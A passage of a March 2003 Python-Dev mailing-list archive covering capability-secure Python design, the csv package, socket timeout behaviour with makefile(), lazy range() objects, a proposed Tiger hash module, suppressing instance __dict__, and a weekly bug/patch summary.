the underlying question is: how much can cap-Python programming be like (or do
we want it to be like) current Python programming?

for example concretely,

module and imports are often used to access "program-wide" factories. Do we
want cap-confined client code to be rewritten in order to pass the factories or
single factory-constructed objects  otherwise:

[Zooko]
>So one design for cap-Python might say that only safe modules can be imported by
>cap-Python code.  Every unsafe privilege would have to be granted by using
>references (passed as arguments, assigned to variables, etc.).  No authority
>would ever be made available to capability-secured code through "import".

or not.

There are trade-offs in terms of necessary semantics changes/complexity vs.
language overall feeling preservation and legacy code reuse and adaptation.


From neal@metaslash.com  Fri Mar 21 00:33:40 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Thu, 20 Mar 2003 19:33:40 -0500
Subject: [Python-Dev] csv package stitched into CVS hierarchy
In-Reply-To: <15994.20750.356162.465058@montanaro.dyndns.org>
References: <15994.20750.356162.465058@montanaro.dyndns.org>
Message-ID: <20030321003340.GN14067@epoch.metaslash.com>

On Thu, Mar 20, 2003 at 05:38:54PM -0600, Skip Montanaro wrote:
> The csv package is now in the main branch of the CVS hierarchy.  I will
> leave the structure in the sandbox for a few days before "cvs remove"ing it
> in case I missed something.

Tim, can you do the magic to make sure the CSV module is in the
Windows distribution?  I think this means modifying
PCbuild/python20.wse at least.

Neal


From guido@python.org  Fri Mar 21 00:57:34 2003
From: guido@python.org (Guido van Rossum)
Date: Thu, 20 Mar 2003 19:57:34 -0500
Subject: [Python-Dev] socket timeouts fail w/ makefile()
In-Reply-To: "Your message of Thu, 20 Mar 2003 16:46:36 CST."
 <15994.17612.495528.162817@montanaro.dyndns.org>
References: <15994.17612.495528.162817@montanaro.dyndns.org>
Message-ID: <200303210057.h2L0vY608028@pcp02138704pcs.reston01.va.comcast.net>

> I discovered much to my chagrin today that the socket module's new timeout
> capability doesn't play well with file objects as returned by a socket's
> makefile method.

Can you explain better how it doesn't work?

> Tim O'Malley's timeoutsocket module avoids this problem by
> implementing a simple file-like object directly on top of the socket
> without calling makefile().  Is there some reason this approach
> wasn't adopted when adding timeouts to the socket module?

I guess nobody thought of this so far.

> I would think the greatest use of timeouts would be using
> higher-level line-oriented modules like urllib and ftplib.  In
> addition, since makefile() isn't always available, it seems
> worthwhile to implement something in socket.py, thus making
> makefile() universally available.

Um, when is makefile() not available?  There's code for Windows that
emulates it, returning a file-like object.  Maybe that code should be
enabled universally rather than only on Windows...

> I filed a bug report about this issue earlier today in case people
> are interested:
> 
>     http://www.python.org/sf/707074

I'm interested, but have no time... :-(

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim.one@comcast.net  Fri Mar 21 01:39:48 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 20 Mar 2003 20:39:48 -0500
Subject: [Python-Dev] csv package stitched into CVS hierarchy
In-Reply-To: <20030321003340.GN14067@epoch.metaslash.com>
Message-ID: <LNBBLJKPBEHFEDALKOLCGELIEBAB.tim.one@comcast.net>

[Neal Norwitz]
> Tim, can you do the magic to make sure the CSV module is in the
> Windows distribution?  I think this means modifying
> PCbuild/python20.wse at least.

There's a lot of stuff that needs to be done to add a new separately
compiled module.  The good news is the same as the bad news here:  a piece
gets dropped on the floor if and only if it isn't accessed by the standard
test suite.  In this case, it looks like the test suite covers it, so be of
good cheer:  nothing will get forgotten (except for whatever pieces
test_csv.py forgets to test <wink>).


From skip@pobox.com  Fri Mar 21 03:15:45 2003
From: skip@pobox.com (Skip Montanaro)
Date: Thu, 20 Mar 2003 21:15:45 -0600
Subject: [Python-Dev] socket timeouts fail w/ makefile()
In-Reply-To: <200303210057.h2L0vY608028@pcp02138704pcs.reston01.va.comcast.net>
References: <15994.17612.495528.162817@montanaro.dyndns.org>
 <200303210057.h2L0vY608028@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <15994.33761.677545.551348@montanaro.dyndns.org>

    >> I discovered much to my chagrin today that the socket module's new
    >> timeout capability doesn't play well with file objects as returned by
    >> a socket's makefile method.

    Guido> Can you explain better how it doesn't work?

When the socket is in non-blocking mode, reads on the file returned by
.makefile() will fail with an IOError if there is nothing to return.

    >> I would think the greatest use of timeouts would be using
    >> higher-level line-oriented modules like urllib and ftplib.  In
    >> addition, since makefile() isn't always available, it seems
    >> worthwhile to implement something in socket.py, thus making
    >> makefile() universally available.

    Guido> Um, when is makefile() not available?  

I don't know.  I was going by the doc string in socketmodule.c which says,
in part:

    ...
    makefile([mode, [bufsize]]) -- return a file object for the socket [*]\n\
    ...
     [*] not available on all platforms!");

Maybe the docs are just wrong.  According to the #ifdef in the code, if
NO_DUP is defined (OS/2, Windows, BeOS), makefile() isn't.

    Guido> There's code for Windows that emulates it, returning a file-like
    Guido> object.  Maybe that code should be enabled universally rather
    Guido> than only on Windows...

That sounds similar to what is in timeoutsocket.py.  It would have the
advantage of providing identical semantics across all platforms.

Skip


From guido@python.org  Fri Mar 21 11:17:29 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 21 Mar 2003 06:17:29 -0500
Subject: [Python-Dev] socket timeouts fail w/ makefile()
In-Reply-To: "Your message of Thu, 20 Mar 2003 21:15:45 CST."
 <15994.33761.677545.551348@montanaro.dyndns.org>
References: <15994.17612.495528.162817@montanaro.dyndns.org>
 <200303210057.h2L0vY608028@pcp02138704pcs.reston01.va.comcast.net>
 <15994.33761.677545.551348@montanaro.dyndns.org>
Message-ID: <200303211117.h2LBHTh23630@pcp02138704pcs.reston01.va.comcast.net>

>     >> I discovered much to my chagrin today that the socket
>     >> module's new timeout capability doesn't play well with file
>     >> objects as returned by a socket's makefile method.
> 
>     Guido> Can you explain better how it doesn't work?
> 
> When the socket is in non-blocking mode, reads on the file returned by
> .makefile() will fail with an IOError if there is nothing to return.

Isn't that exactly what a timeout is supposed to do?  What would you
have expected?

>     >> I would think the greatest use of timeouts would be using
>     >> higher-level line-oriented modules like urllib and ftplib.  In
>     >> addition, since makefile() isn't always available, it seems
>     >> worthwhile to implement something in socket.py, thus making
>     >> makefile() universally available.
> 
>     Guido> Um, when is makefile() not available?  
> 
> I don't know.  I was going by the doc string in socketmodule.c which
> says, in part:
> 
>     ...
>     makefile([mode, [bufsize]]) -- return a file object for the socket [*]\n\
>     ...
>      [*] not available on all platforms!");
> 
> Maybe the docs are just wrong.  According to the #ifdef in the code, if
> NO_DUP is defined (OS/2, Windows, BeOS), makefile() isn't.

That's the docs for the _socket module, which is (nowadays) an
implementation detail.  Read socket.py instead.

>     Guido> There's code for Windows that emulates it, returning a
>     Guido> file-like object.  Maybe that code should be enabled
>     Guido> universally rather than only on Windows...
> 
> That sounds similar to what is in timeoutsocket.py.  It would have the
> advantage of providing identical semantics across all platforms.

Again, I won't have time to do this until after I'm back from Python
UK, so I'd appreciate it if someone helped with this, e.g. by filing a
patch.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Fri Mar 21 12:28:39 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 21 Mar 2003 06:28:39 -0600
Subject: [Python-Dev] socket timeouts fail w/ makefile()
In-Reply-To: <200303211117.h2LBHTh23630@pcp02138704pcs.reston01.va.comcast.net>
References: <15994.17612.495528.162817@montanaro.dyndns.org>
 <200303210057.h2L0vY608028@pcp02138704pcs.reston01.va.comcast.net>
 <15994.33761.677545.551348@montanaro.dyndns.org>
 <200303211117.h2LBHTh23630@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <15995.1399.226407.866954@montanaro.dyndns.org>

    >> When the socket is in non-blocking mode, reads on the file returned
    >> by .makefile() will fail with an IOError if there is nothing to
    >> return.

    Guido> Isn't that exactly what a timeout is supposed to do?  What would
    Guido> you have expected?

Sorry, I wasn't clear.  It fails immediately.  The timeout isn't observed. 
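
For reference, a minimal sketch of the behaviour being asked for: a read on
the object returned by makefile() should wait for the socket's timeout and
only then fail. It assumes present-day Python 3, not the 2.3 code under
discussion. The helper name timed_readline and the use of
socket.socketpair() are illustrative choices, not part of any patch
mentioned in this thread.

```python
import socket
import time


def timed_readline(timeout):
    """Read from an idle socket via makefile(); return (exception, seconds waited)."""
    # Assumption: socketpair() gives two connected sockets with no data pending.
    a, b = socket.socketpair()
    try:
        a.settimeout(timeout)
        reader = a.makefile("rb")
        start = time.monotonic()
        try:
            reader.readline()      # nothing was sent, so this cannot succeed
            outcome = None
        except OSError as exc:     # socket.timeout is an OSError subclass
            outcome = exc
        waited = time.monotonic() - start
        reader.close()
        return outcome, waited
    finally:
        a.close()
        b.close()


exc, waited = timed_readline(0.2)
print(type(exc).__name__, round(waited, 2))
```

If the timeout is honoured, the wait is roughly the configured timeout, not
zero, which is the distinction being drawn here.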

    >> makefile([mode, [bufsize]]) -- return a file object for the socket [*]\n\
    >> ...
    >> [*] not available on all platforms!");

    Guido> That's the docs for the _socket module, which is (nowadays) an
    Guido> implementation detail.  Read socket.py instead.

Maybe _socket shouldn't have such a detailed doc string or should indicate
its subservient relationship to socket?  I was reading it as if it was a
comment in the code, which, in theory, should still be accurate.

    Guido> Again, I won't have time to do this until after I'm back from
    Guido> Python UK, so I'd appreciate it if someone helped with this,
    Guido> e.g. by filing a patch.

I'll take a look.  There's a bug already in the system
(http://www.python.org/sf/707074) to which a patch could be applied, so if
someone comes up with something, that's where it goes.

Skip


From dave@boost-consulting.com  Fri Mar 21 14:43:36 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Fri, 21 Mar 2003 09:43:36 -0500
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: <200303202233.h2KMXbG07782@odiug.zope.com> (Guido van Rossum's
 message of "Thu, 20 Mar 2003 17:33:35 -0500")
References: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com>
 <200303131903.h2DJ3Ug06240@odiug.zope.com>
 <uwuitaf3c.fsf@boost-consulting.com>
 <200303202233.h2KMXbG07782@odiug.zope.com>
Message-ID: <uznnowzjb.fsf@boost-consulting.com>

Guido van Rossum <guido@python.org> writes:

>> Guido van Rossum <guido@python.org> writes:
>> 
>> > The bytecode compiler should be clever enough to see that you're
>> > writing
>> >
>> >   for i in range(...): ...
>> >
>> > and that there's no definition of range other than the built-in one
>> > (this requires a subtle change of language rules); it can then
>> > substitute an internal equivalent to xrange().
>> 
>> Ouch!  What happens to:
>> 
>>        def foo(seq):
>>            for x in seq:
>>                ...
>> 
>>        foo(xrange(small, really_big))
>> 
>> if xrange dies??
>
> Good point.  I guess xrange() can't die until range() becomes an
> iterator (which can't be before Python 3.0).
>
> Hm, maybe range() shouldn't be an iterator but an iterator
> generator.  No time to explain; see the discussion about restartable
> iterators.

I think what you mean is fairly obvious.  list et al. are iterator
generators, right?  It's just a thing with an __iter__ function which
produces an iterator?

If so, I tend to agree that's the right behavior for range().
range(x,y,z) should be an immutable object.

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From guido@python.org  Fri Mar 21 14:55:16 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 21 Mar 2003 09:55:16 -0500
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: "Your message of Fri, 21 Mar 2003 09:43:36 EST."
 <uznnowzjb.fsf@boost-consulting.com>
References: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com>
 <200303131903.h2DJ3Ug06240@odiug.zope.com>
 <uwuitaf3c.fsf@boost-consulting.com>
 <200303202233.h2KMXbG07782@odiug.zope.com> <uznnowzjb.fsf@boost-consulting.com>
Message-ID: <200303211455.h2LEtGp24202@pcp02138704pcs.reston01.va.comcast.net>

> > Hm, maybe range() shouldn't be an iterator but an iterator
> > generator.  No time to explain; see the discussion about restartable
> > iterators.
> 
> I think what you mean is fairly obvious.  list et al. are iterator
> generators, right?  It's just a thing with an __iter__ function which
> produces an iterator?
> 
> If so, I tend to agree that's the right behavior for range().
> range(x,y,z) should be an immutable object.

Yes.  Idioms like this are used fairly often:

  seq = range(...)

  for i in seq: ...
  for i in seq: ...
  # etc.
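
The distinction can be sketched in a few lines. This is only an
illustration in present-day Python 3 syntax (an assumption; generators
inside classes looked different in 2003), and LazyRange is a hypothetical
name, not the proposed implementation. The object holds only its bounds,
and each call to __iter__ hands out a fresh iterator, so the idiom above
keeps working without building a list.

```python
class LazyRange:
    """Re-iterable range-like object: every __iter__ call starts a fresh pass."""

    def __init__(self, start, stop, step=1):
        if step == 0:
            raise ValueError("step must not be zero")
        self._start, self._stop, self._step = start, stop, step

    def __iter__(self):
        # A generator method: each call returns a new, independent iterator.
        value = self._start
        while (value < self._stop) if self._step > 0 else (value > self._stop):
            yield value
            value += self._step


seq = LazyRange(0, 3)
first_pass = list(seq)
second_pass = list(seq)      # works again: seq itself is never consumed

one_shot = iter(seq)         # a bare iterator, by contrast, runs out
drained = list(one_shot)
leftover = list(one_shot)    # nothing left on the second attempt
```

The sketch does not enforce immutability; it only avoids mutating its own
state during iteration.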

--Guido van Rossum (home page: http://www.python.org/~guido/)


From skip@pobox.com  Fri Mar 21 17:53:03 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 21 Mar 2003 11:53:03 -0600
Subject: [Python-Dev] socket timeouts fail w/ makefile()
Message-ID: <15995.20863.424664.1587@montanaro.dyndns.org>

    Guido> Again, I won't have time to do this until after I'm back from
    Guido> Python UK, so I'd appreciate it if someone helped with this,
    Guido> e.g. by filing a patch.

    Skip> I'll take a look.

I attached a patch to http://www.python.org/sf/707074 which makes the socket
wrapper unconditional, and added a new test case (test_urllibnet.py -
requires the 'network' resource) which fails before applying the patch and
succeeds afterward.  Would someone else like to take a look at it?  Guido's
the natural candidate, but is busy with near-term conferences.

Thx,

Skip


From Tino.Lange@isg.de  Fri Mar 21 19:15:20 2003
From: Tino.Lange@isg.de (Tino Lange)
Date: Fri, 21 Mar 2003 20:15:20 +0100
Subject: [Python-Dev] New Module? Tiger Hashsum
Message-ID: <3E7B64C8.F3302144@isg.de>

Hi!

Today I suddenly needed the Tiger hash sums from Python - it's not
included in the standard distribution and I couldn't find it anywhere.
So I thought that it's maybe time again to contribute :-)

It was quite a straightforward task to write a wrapper that is able to
calculate such hash sums from Python; besides tiger.c/tiger.h it's
only a few lines of code. It runs perfectly under Linux with distutils - I
guess someone who knows Windows better has to look into a Windows port
because of the 'long long' integers (shouldn't be too hard) ...

But at least for me it's really useful:

> >>> import tiger
> >>> tiger.tiger("Python is cool... And now it can even calculate tiger hashsums!")
> (135509944, 135510340, 135510352, 135509920, 135510016, 135197188)
> >>> tiger.__doc__
> 'This module gives you access to the fast, cryptographic tiger hash function from Eli Biham, see http://www.cs.technion.ac.il/~biham/Reports/Tiger/ for details.'
> >>> tiger.tiger.__doc__
> 'tiger(string) -> (int, int, int, int, int, int) -- compute a 192 bit hash-sum of given string (which can contain zero characters)'

Are you interested to get the code, maybe for the next release? Shall I
send it to someone of you developers? Or upload somewhere to your
project page? Or just send it here as attachment?

Just let me know.
Best regards!

Tino


From skip@pobox.com  Fri Mar 21 19:36:13 2003
From: skip@pobox.com (Skip Montanaro)
Date: Fri, 21 Mar 2003 13:36:13 -0600
Subject: [Python-Dev] New Module? Tiger Hashsum
In-Reply-To: <3E7B64C8.F3302144@isg.de>
References: <3E7B64C8.F3302144@isg.de>
Message-ID: <15995.27053.118634.347706@montanaro.dyndns.org>

    Tino> I guess someone who knows windows better has to look for a windows
    Tino> port because of the 'long long' integers (shouldn't be too hard)
    Tino> ...

The LONG_LONG macro is defined in Python's Include/pyport.h file.  Just use
it instead of 'long long'.  On Windows I think 'long long' is spelled
'__int64'.

Skip


From Tino.Lange@isg.de  Fri Mar 21 20:02:31 2003
From: Tino.Lange@isg.de (Tino Lange)
Date: Fri, 21 Mar 2003 21:02:31 +0100
Subject: [Python-Dev] New Module? Tiger Hashsum
References: <3E7B64C8.F3302144@isg.de> <15995.27053.118634.347706@montanaro.dyndns.org>
Message-ID: <3E7B6FD7.193B1981@isg.de>

Skip,

Ah, great!
Thank you! I'll try that tomorrow with MSVC 6.

Cheers,

Tino

----------

Skip Montanaro wrote:
> 
>     Tino> I guess someone who knows windows better has to look for a windows
>     Tino> port because of the 'long long' integers (shouldn't be too hard)
>     Tino> ...
> 
> The LONG_LONG macro is defined in Python's Include/pyport.h file.  Just use
> it instead of 'long long'.  On Windows I think 'long long' is spelled
> '__int64'.
> 
> Skip


From martin@v.loewis.de  Fri Mar 21 22:11:12 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 21 Mar 2003 23:11:12 +0100
Subject: [Python-Dev] New Module? Tiger Hashsum
In-Reply-To: <3E7B64C8.F3302144@isg.de>
References: <3E7B64C8.F3302144@isg.de>
Message-ID: <m3n0jogykf.fsf@mira.informatik.hu-berlin.de>

Tino Lange <Tino.Lange@isg.de> writes:

> Are you interested to get the code, maybe for the next release? Shall I
> send it to someone of you developers? Or upload somewhere to your
> project page? Or just send it here as attachment?

Dear Tino,

We are usually reluctant to add modules to the Python core
distribution, until there is some user community interested in that
module. Until then, I recommend you submit your module to the Vaults
of Parnassus, and announce it to comp.lang.python.announce.

Regards,
Martin


From cnetzer@mail.arc.nasa.gov  Fri Mar 21 22:42:07 2003
From: cnetzer@mail.arc.nasa.gov (Chad Netzer)
Date: 21 Mar 2003 14:42:07 -0800
Subject: [Python-Dev] Re: More int/long integration issues
In-Reply-To: <200303211455.h2LEtGp24202@pcp02138704pcs.reston01.va.comcast.net>
References: <7F171EB5E155544CAC4035F0182093F03CF792@INGDEXCHSANC1.ingdirect.com>
 <200303131903.h2DJ3Ug06240@odiug.zope.com>
 <uwuitaf3c.fsf@boost-consulting.com>
 <200303202233.h2KMXbG07782@odiug.zope.com>
 <uznnowzjb.fsf@boost-consulting.com>
 <200303211455.h2LEtGp24202@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1048286527.651.29.camel@sayge.arc.nasa.gov>

On Fri, 2003-03-21 at 06:55, Guido van Rossum wrote:

> > > Hm, maybe range() shouldn't be an iterator but an iterator
> > > generator.  No time to explain; see the discussion about restartable
> > > iterators.

Hmmm. Now that I've uploaded my patch extending range() to longs, I'd like
to work on this.  I've already written a C range() iterator
(incorporating PyLongs), and it would be very nice to have it
automatically be a lazy range() when used in a loop.

In any case, assuming you are quite busy, but would consider this for
the 2.4 timeframe, I will do some work on it. If it is already being
covered, I'll gladly stay away from it. :)

-- 
Bay Area Python Interest Group - http://www.baypiggies.net/

Chad Netzer
(any opinion expressed is my own and not NASA's or my employer's)


From Tino.Lange@isg.de  Sat Mar 22 08:42:20 2003
From: Tino.Lange@isg.de (Tino Lange)
Date: Sat, 22 Mar 2003 09:42:20 +0100
Subject: [Python-Dev] Icon for Python RSS Feed?
Message-ID: <3E7C21EC.1A5BD79@isg.de>

Hi!

Can you add a nice icon for the news XML RDF resource
http://www.python.org/channews.rdf
for example in http://www.python.org/favicon.ico? I think this is the
standard location - at least for my KNewsTicker. Then your news will be
clearly marked as Python News in the Newsticker :-)

Thanks and have a nice day!

Tino


From dave@boost-consulting.com  Sat Mar 22 23:25:00 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sat, 22 Mar 2003 18:25:00 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
Message-ID: <ur88zougj.fsf@boost-consulting.com>

I am generating extension types derived from a type which is derived
from 'int' by calling the metaclass; in order to prevent instances
of the most-derived type from getting an instance __dict__ I am
putting an empty tuple in the class __dict__ as '__slots__'.  The
problem with this hack is that it disables pickling of these babies:

   "a class that defines __slots__ without defining __getstate__
    cannot be pickled"

Yes, I can define __getstate__, __setstate__, and __getinitargs__ (the
only one that can actually do any work, since ints are immutable),
but I was wondering if there's a more straightforward way to suppress
the instance __dict__ in the derived classes.
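
To make the setup concrete, here is a minimal sketch of the trick
described above: calling the metaclass directly and passing an empty
tuple as '__slots__'. It assumes present-day Python 3 and uses the
hypothetical class names Plain and Slim; the real extension types are
generated from C and are not shown in this thread.

```python
# Two int subclasses created by calling the metaclass (type) directly.
Plain = type("Plain", (int,), {})
Slim = type("Slim", (int,), {"__slots__": ()})   # empty __slots__: no instance __dict__

plain, slim = Plain(3), Slim(3)
plain.note = "ok"            # Plain instances carry a __dict__, so this works

try:
    slim.note = "rejected"   # Slim instances have nowhere to store it
    slim_accepts_attributes = True
except AttributeError:
    slim_accepts_attributes = False
```

Both classes still behave as ints; only the per-instance dictionary
differs.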

TIA,
-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From martin@v.loewis.de  Sun Mar 23 08:24:51 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 23 Mar 2003 09:24:51 +0100
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <ur88zougj.fsf@boost-consulting.com>
References: <ur88zougj.fsf@boost-consulting.com>
Message-ID: <m3k7eqxzfw.fsf@mira.informatik.hu-berlin.de>

David Abrahams <dave@boost-consulting.com> writes:

> Yes, I can define __getstate__, __setstate__, and __getinitargs__ (the
> only one that can actually do any work, since ints are immutable),
> but I was wondering if there's a more straightforward way to suppress
> the instance __dict__ in the derived classes.

Setting tp_dictoffset to 0 might help. However, I'm unsure what
consequences this has; read the source.

Regards,
Martin


From dave@boost-consulting.com  Sun Mar 23 12:58:30 2003
From: dave@boost-consulting.com (David Abrahams)
Date: Sun, 23 Mar 2003 07:58:30 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <m3k7eqxzfw.fsf@mira.informatik.hu-berlin.de> (martin@v.loewis.de's
 message of "23 Mar 2003 09:24:51 +0100")
References: <ur88zougj.fsf@boost-consulting.com>
 <m3k7eqxzfw.fsf@mira.informatik.hu-berlin.de>
Message-ID: <uel4yjl3d.fsf@boost-consulting.com>

martin@v.loewis.de (Martin v. Löwis) writes:

> David Abrahams <dave@boost-consulting.com> writes:
>
>> Yes, I can define __getstate__, __setstate__, and __getinitargs__ (the
>> only one that can actually do any work, since ints are immutable),
>> but I was wondering if there's a more straightforward way to suppress
>> the instance __dict__ in the derived classes.
>
> Setting tp_dictoffset to 0 might help.

AFAICT I don't get to do that, since as I wrote:

       I am generating extension types derived from a type which is
       derived from 'int' by calling the metaclass
                          ^^^^^^^^^^^^^^^^^^^^^^^^

> However, I'm unsure what consequences this has; read the source.

Unfortunately, this is one of the twistiest areas of the Python
source, so while I could struggle through it I'm hoping there's
someone around here who knows the answer off the top of his benevolent
Dutch head <wink>

-- 
Dave Abrahams
Boost Consulting
www.boost-consulting.com


From skip@mojam.com  Sun Mar 23 13:00:21 2003
From: skip@mojam.com (Skip Montanaro)
Date: Sun, 23 Mar 2003 07:00:21 -0600
Subject: [Python-Dev] Weekly Python Bug/Patch Summary
Message-ID: <200303231300.h2ND0LH14101@manatee.mojam.com>

Bug/Patch Summary
-----------------

372 open / 3479 total bugs (+23)
133 open / 2033 total patches (+11)

New Bugs
--------

ncurses/curses on solaris (2003-03-10)
	http://python.org/sf/700780
Compiler Limits (indentation) (2003-03-10)
	http://python.org/sf/700827
WINDOW in py_curses.h needs ncurses-devel (2003-03-11)
	http://python.org/sf/701751
configure option --enable-shared make problems  (2003-03-11)
	http://python.org/sf/701823
Thread running (os.system or popen#) (2003-03-11)
	http://python.org/sf/701836
getsockopt/setsockopt with SO_RCVTIMEO are inconsistent (2003-03-11)
	http://python.org/sf/701936
--without-cxx flag of configure isn't documented. (2003-03-12)
	http://python.org/sf/702147
No documentation of static/dynamic python modules. (2003-03-12)
	http://python.org/sf/702157
dumbdbm __del__ bug (2003-03-12)
	http://python.org/sf/702775
deepcopy can't copy self-referential new-style classes (2003-03-13)
	http://python.org/sf/702858
os.utime can fail with TypeError (2003-03-13)
	http://python.org/sf/703066
os.popen with mode "rb" fails on Unix (2003-03-13)
	http://python.org/sf/703198
Several objects don't decref tmp on failure in subtype_new (2003-03-14)
	http://python.org/sf/703666
strange warnings messages in interpreter (2003-03-14)
	http://python.org/sf/703779
Problems printing and sleep (2003-03-15)
	http://python.org/sf/704194
_tkinter.c won't build w/o threads? (2003-03-16)
	http://python.org/sf/704641
Problems building python with tkinter on HPUX... (2003-03-17)
	http://python.org/sf/704919
python-mode.el: sexp commands don't understand Python (2003-03-17)
	http://python.org/sf/705005
imap docs: s/criterium/criterion/ (2003-03-17)
	http://python.org/sf/705120
Assertion  failed, python aborts (2003-03-17)
	http://python.org/sf/705231
Error when using PyZipFile to create archive (2003-03-17)
	http://python.org/sf/705295
test_atexit fails in directories with spaces (2003-03-18)
	http://python.org/sf/705792
python accepts illegal "import mod.sub as name" syntax (2003-03-19)
	http://python.org/sf/706253
print raises exception when no console available (2003-03-19)
	http://python.org/sf/706263
test_socket fails when not connected (2003-03-19)
	http://python.org/sf/706450
u''.translate not documented (2003-03-19)
	http://python.org/sf/706546
Expose FinderInfo in FSCatalogInfo (2003-03-19)
	http://python.org/sf/706585
Carbon.File.FSSpec should accept non-existing pathnames (2003-03-19)
	http://python.org/sf/706592
codecs.open and iterators (2003-03-19)
	http://python.org/sf/706595
timeouts incompatible w/ line-oriented protocols (2003-03-20)
	http://python.org/sf/707074
-i -u options give SyntaxError on Windows (2003-03-21)
	http://python.org/sf/707576
elisp: IM-python menu and newline in function defs (2003-03-21)
	http://python.org/sf/707707
math.fabs documentation is misleading (2003-03-22)
	http://python.org/sf/708205
DistributionMetaData error ? (2003-03-23)
	http://python.org/sf/708320

New Patches
-----------

Replacing and deleting files in a zipfile archive. (2003-03-10)
	http://python.org/sf/700858
Wrong prototype for PyUnicode_Splitlines on documentation (2003-03-11)
	http://python.org/sf/701395
more apply removals (2003-03-11)
	http://python.org/sf/701494
Reloading pseudo modules (2003-03-11)
	http://python.org/sf/701743
AE Inheritance fixes (2003-03-12)
	http://python.org/sf/702620
Kill off docs for unsafe macros (2003-03-13)
	http://python.org/sf/702933
add direct access to MD5 compression function to md5 module (2003-03-16)
	http://python.org/sf/704676
Fix a few broken links in pydoc (2003-03-19)
	http://python.org/sf/706338
fix bug #685846: raw_input defers signals (2003-03-19)
	http://python.org/sf/706406
Adds Mock Object support to unittest.TestCase (2003-03-19)
	http://python.org/sf/706590
time.tzset standards compliance update (2003-03-19)
	http://python.org/sf/706707
fix bug #682813: dircache.listdir doesn't signal error (2003-03-20)
	http://python.org/sf/707167
Improve code generation (2003-03-20)
	http://python.org/sf/707257
Allow range() to return long integer values (2003-03-21)
	http://python.org/sf/707427
fix for #698517, Tkinter and tk8.4.2 (2003-03-21)
	http://python.org/sf/707701
bug fix 702858: deepcopying reflexive objects (2003-03-21)
	http://python.org/sf/707900
TelnetPopen3, TelnetBase, Expect split (2003-03-22)
	http://python.org/sf/708007
unchecked return value in import.c (2003-03-22)
	http://python.org/sf/708201

Closed Bugs
-----------

printing email object deletes whitespace (2002-08-13)
	http://python.org/sf/594893
asynchat problems multi-threaded (2002-08-14)
	http://python.org/sf/595217
plat-mac not on sys.path (2003-01-03)
	http://python.org/sf/661521
codec registry and Python embedding problem (2003-01-06)
	http://python.org/sf/663074
email.Header() encoding does not work properly (2003-01-27)
	http://python.org/sf/675420
Applet support is broken (2003-02-18)
	http://python.org/sf/688907
test_cpickle overflows stack on MacOS9 (2003-02-21)
	http://python.org/sf/690622
PyMac_GetFSRef should accept unicode (2003-03-02)
	http://python.org/sf/696253
test_posix fails: getlogin (2003-03-04)
	http://python.org/sf/697556
list.index() bhvr change > python2.x (2003-03-06)
	http://python.org/sf/698561
Tutorial uses omitted slice indices before explaining them (2003-03-06)
	http://python.org/sf/699237
ncurses/curses on solaris (2003-03-07)
	http://python.org/sf/699379
MIMEText's c'tor adds unwanted trailing newline to text (2003-03-07)
	http://python.org/sf/699600

Closed Patches
--------------

Put IDE scripts in ~/Library (2002-07-08)
	http://python.org/sf/578667
Fix: asynchat.py: endless loop (2002-12-06)
	http://python.org/sf/649762
(email) Escape backslashes in specialsre and escapesre (2003-01-06)
	http://python.org/sf/663369
HTMLParser -- allow "," in attributes (2003-01-17)
	http://python.org/sf/669683
test_htmlparser.py -- "," in attributes (2003-01-24)
	http://python.org/sf/674448
Add tzset method to time module (2003-01-27)
	http://python.org/sf/675422
bundlebuilder: Add dylibs, frameworks to the bundle (2003-02-06)
	http://python.org/sf/681927
allow proxy server authentication with pimp (2003-03-02)
	http://python.org/sf/696392
optparse unit tests + fixes (2003-03-05)
	http://python.org/sf/697939


From mwh@python.net  Sun Mar 23 13:08:30 2003
From: mwh@python.net (Michael Hudson)
Date: Sun, 23 Mar 2003 13:08:30 +0000
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: <uel4yjl3d.fsf@boost-consulting.com> (David Abrahams's message
 of "Sun, 23 Mar 2003 07:58:30 -0500")
References: <ur88zougj.fsf@boost-consulting.com>
 <m3k7eqxzfw.fsf@mira.informatik.hu-berlin.de>
 <uel4yjl3d.fsf@boost-consulting.com>
Message-ID: <2my936kz75.fsf@starship.python.net>

David Abrahams <dave@boost-consulting.com> writes:

> Unfortunately, this is one of the twistiest areas of the Python
> source, so while I could struggle through it I'm hoping there's
> someone around here who knows the answer off the top of his benevolent
> Dutch head <wink>

Well, I'm familiar enough with that bit of the source (search for
"add_dict" in typeobject.c) to answer your question: no, there's no
more straightforward way to suppress the instance __dict__ in the
derived classes.

Cheers,
M.

-- 
 The rapid establishment of social ties, even of a fleeting nature,
 advance not only that goal but its standing in the uberconscious
 mesh of communal psychic, subjective, and algorithmic interbeing.
 But I fear I'm restating the obvious.  -- Will Ware, comp.lang.python


From guido@python.org  Sun Mar 23 13:21:12 2003
From: guido@python.org (Guido van Rossum)
Date: Sun, 23 Mar 2003 08:21:12 -0500
Subject: [Python-Dev] How to suppress instance __dict__?
In-Reply-To: "Your message of Sat, 22 Mar 2003 18:25:00 EST."
 <ur88zougj.fsf@boost-consulting.com>
References: <ur88zougj.fsf@boost-consulting.com>
Message-ID: <200303231321.h2NDLCF04208@pcp02138704pcs.reston01.va.comcast.net>

> I am generating extension types derived from a type which is derived
